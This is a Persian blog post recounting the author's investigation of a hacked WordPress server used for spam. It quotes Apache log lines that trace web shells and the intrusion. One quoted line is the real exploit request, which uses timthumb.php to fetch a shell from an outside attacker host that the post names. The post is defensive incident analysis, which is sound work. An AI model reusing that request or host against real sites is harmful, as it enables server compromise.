حول و هوش ۴ صبح بود که میخواستم برم کوه خیر سرم که دیدم یهو کلی میل سرایز شده سمت اینباکسم و یه اسپمر وحشی رم کرده و داره فرت و فرت میل اسپم میفرسته.
خلاصه این شد که رفتم پشت سیستم و اول رسیدم به همچین آدرس کذایی رو سرور که از طریق اون کلی میل اسپم میفرستاد.
1 |
/home/ex/public_html/wp–admin/images/screenshots/247@abu.php |
وقتی که محتویاتش رو دیدم اولین کاری که به ذهنم رسید این بود که کل کدای داخلش رو با یه مادر فاکر جابجا کنم تا هکره توی اجرای بعدی ببینه و حسابی عصبانی شه! :)
بعد چند دقیقه بود که دیدم دوباره محتوا رو عوض کرده و این یعنی وجود مکانی که تبدیل شده به مقر فرماندهی و اینطوری بود که به کل زدم فایل رو پاک کردم و سریع رفتم سر وقت لاگ اپاچی
1 |
41.206.12.37 – – [14/Mar/2013:04:35:20 +0330] “POST /wp-admin/images/screenshots/[email protected] HTTP/1.1” 200 6886 “http://ex.com/wp-admin/images/screenshots/[email protected]” “Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090624 Firefox/3.5” |
حالا دیگه آیپی رو داریم :) فایرفاکس ۳.۵ و طرف ظاهرا ویندوزکاره و البته اینا مشخصات یه بابایی توی نیجیریه ست! و همین احتمال رو قوی میکنه که طرف داره از تور استفاده میکنه.
از روی دنبال کردن آیپی رسیدم به یه فایلی به اسم theme-edit.php داخل پوشه wp-admin و نکته جالب این بود که با باز کردن این فایل تو ادیتور مطلقا چیزی دستگیر آدم نمیشد به این خاطر که آقای هکر کد php رو رمزنگاری کرده بود و بنابراین محتویت فایل رو میدیم به سایتی مشابه ddecode که کارش تبدیل محتوای رمز شده به حالت عادیه. بسته به سختی کد طی تعداد مراحلی این سایت کد واقعی رو در اختیارتون میگذاره و جالبه که این کد رو در یازدهمین مرحله می تونه از حالت رمز خارج کنه :)
شروع بسم الله با افتخار نوشتهی هکر رو میبینیم! (کد دیکد شده شل)
/* hide shell edited by r1pp3rm4ya*/
بله یک شل مخفی کشف کردیم! شلی که بخاطر محتوای رمز شده ش آنتی ویروس clam هم هشداری بهتون نمیده. شاید بشه فقط از رو md5 حجم فایل مثلا گفت که احتمال داره فرد دیگهای هم توی این کره خاکی توسط این شل آلوده شده یا نه.
ادامه سرک کشی به لاگ من رو رسوند به یه آیپی جدید و یه فایل جدید اینکود شده ولی چون دقیقا بازه زمانیشون یکی بود حدس میزنم وسط کار آیپی تور فقط عوض شده باشه و پشت جفتشون یه ادم بیشتر نیست.
1 |
180.253.0.28 – – [14/Mar/2013:03:49:08 +0330] “POST /wp-content/themes/TheStyle2//temp/892c731e14ff80782a5fe6d67ee4d5e4.php HTTP/1.1” 200 72356 “http://ex.com/wp-content/themes/TheStyle2//temp/892c731e14ff80782a5fe6d67ee4d5e4.php” “Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0” |
با نگاه کردن به فایل از رمز خارج شده میشه حدس زد که ازش برای وصل شدن به دیتابیس استفاده میکنه و همه اینا یعنی خطر! دنبال فایلهای passwd و shadow و این موارد نیز هست پس این نقاطیه که باید دسترسی read رو طوری تنظیم کنید که فقط کاربر root بتونه محتویاتشون رو ببینه. در حالت عادی یوزر امکان مشاهده محتوای خیلی از فایلهای حساس etc رو داره.
اما ادامه خوندن لاگ ما رو به خطهای خیلی مهمی رهنمون میکنه :) دقیقا از شروع حمله تا زمان موفقیت رو میشه دید پروسهای که واقعا دید آدم رو نسبت به امنیت و این جور موارد به کل دگرگون میکنه
1 2 3 4 |
180.253.0.28 – – [14/Mar/2013:03:47:35 +0330] “GET /wp-search.php HTTP/1.1” 404 – “-“ “Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0” 180.253.0.28 – – [14/Mar/2013:03:47:42 +0330] “GET /wp-content/themes/TheStyle2/style.css HTTP/1.1” 200 28123 “http://ex.com/” “Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0” 180.253.0.28 – – [14/Mar/2013:03:47:42 +0330] “GET /wp-content/uploads/2012/06/nyed2013-34-221×300.jpg HTTP/1.1” 200 20654 “http://ex.com/” “Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0” 180.253.0.28 – – [14/Mar/2013:03:48:25 +0330] “GET /wp-content/themes/TheStyle2/timthumb.php?src=http://blogger.com.bathroomremodeling.org/cok.php HTTP/1.1” 200 1000 “-“ “Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0” |
اگه یادتون باشه پست قبلی در مورد یه شل به اسم wp-search گفتم. شلی که پاک شد اما اون هکر بعد چند روز اومده سر وقتش! بی خبر از اینکه پاک شده و البته ارور ۴۰۴ گرفته:)
اما بیکار ننشسته! احتمالا از همون تکنیکی که بار پیش شل رو وارد سیستم کرده اینبار هم اومده و اون روش رو دنبال کرده.
خط دوم اومده استایل قالب وبلاگ رو گرفته حدس میزنم از داخل استایل خواسته ببینه چه پلاگینایی مثلا میتونسته طرف استفاده کرده باشه که احتمالا حفره ای داشته باشن برای استفادههای بعدی.
و بعد در چندین مورد که همه ش رو اینجا نگذاشتم با استفاده از متد GET داخل پوشه آپلود رو میگرده به امید پیدا کردن اون حفره!
به نظرم خط ۴م دقیقا جایی بوده که حفره رو پیدا کرده و توسط متد GET و با استفاده از سایت خودش تونسته شل خودش رو بارگزاری کنه.
برنامهنویس نیستم اما حدس میزنم تونسته از حفرهای توی برنامه timthumb استفاده کنه و کد خودش رو که توی سایتش موجود بوده رو با استفاده از ضعف این برنامه به سرور قربانی منتقل کنه.
راستش رو بخواید حتی متوجه آدرس جایی که کد رو گذاشته نمیشم :))
http://blogger.com.bathroomremodeling.org/
ولی داخلش که بشید سه تا کد اصلی ش رو خواهید دید که با استفاده از متد GET اونها رو به سیستم قربانی منتقل میکنه. پیشنهاد میکنم حسابی مراقب باشید که یهو خودتون الوده نشید با وارد شدن از طریق مرورگر! و خلاصه اینکه احتمالا مشکل پیدا شد! و چند تا شل جدید کشف شد و احتمالا یه حفره توی برنامه ذکر شده :)
ساعت ۷:۱۳ با تاخیر برم کوه!
دیدگاهتان را بنویسید